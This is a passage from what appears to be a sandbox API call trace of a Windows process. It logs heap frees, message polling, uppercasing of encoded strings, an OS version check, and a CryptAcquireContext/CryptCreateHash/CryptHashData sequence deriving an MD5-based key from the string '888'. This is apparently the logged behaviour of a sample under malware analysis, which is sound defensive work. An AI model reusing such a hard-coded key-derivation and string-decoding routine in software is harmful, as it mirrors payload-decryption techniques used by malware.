dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.439] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0209.439] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0209.439] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0209.440] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.440] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.440] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.440] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0209.440] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0209.440] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0209.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0209.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0209.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0209.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0209.441] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0209.441] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0209.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0209.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0209.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0209.441] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0209.441] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.441] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.441] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.441] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.441] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0209.441] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0209.441] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.441] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.441] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.441] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.441] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.442] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0209.442] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0209.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7160, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0209.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0209.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6fe0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0209.442] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c7f8) returned 1 [0209.443] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.443] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.443] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0209.443] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.443] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0209.443] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.443] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.443] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.443] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.443] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.443] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.443] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.443] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.443] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.443] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.443] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.443] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.444] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.444] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.444] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.444] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.444] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0209.444] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.444] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0209.444] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.444] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.444] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.444] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.444] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.444] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.444] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.444] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0209.444] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.444] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0209.444] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.444] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.444] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0209.444] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.444] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0209.444] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.445] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.445] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.445] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.445] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0209.445] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.445] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0209.445] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.445] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.445] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.445] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.445] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.445] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.445] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.445] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.445] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.445] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.445] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.445] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.445] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.445] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.445] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.445] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.445] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab3c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0209.446] CryptCreateHash (in: hProv=0xa7c7f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0209.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d28, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.446] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0209.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0209.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71d38, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0209.446] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.446] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.446] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.446] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.446] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.446] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.446] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0209.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab410, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0209.447] CryptHashData (hHash=0x9e1ab8, pbData=0x2a71be8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0209.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.447] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.447] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0209.447] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.447] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0209.447] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.447] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.447] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0209.447] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.447] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0209.447] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.447] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0209.447] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 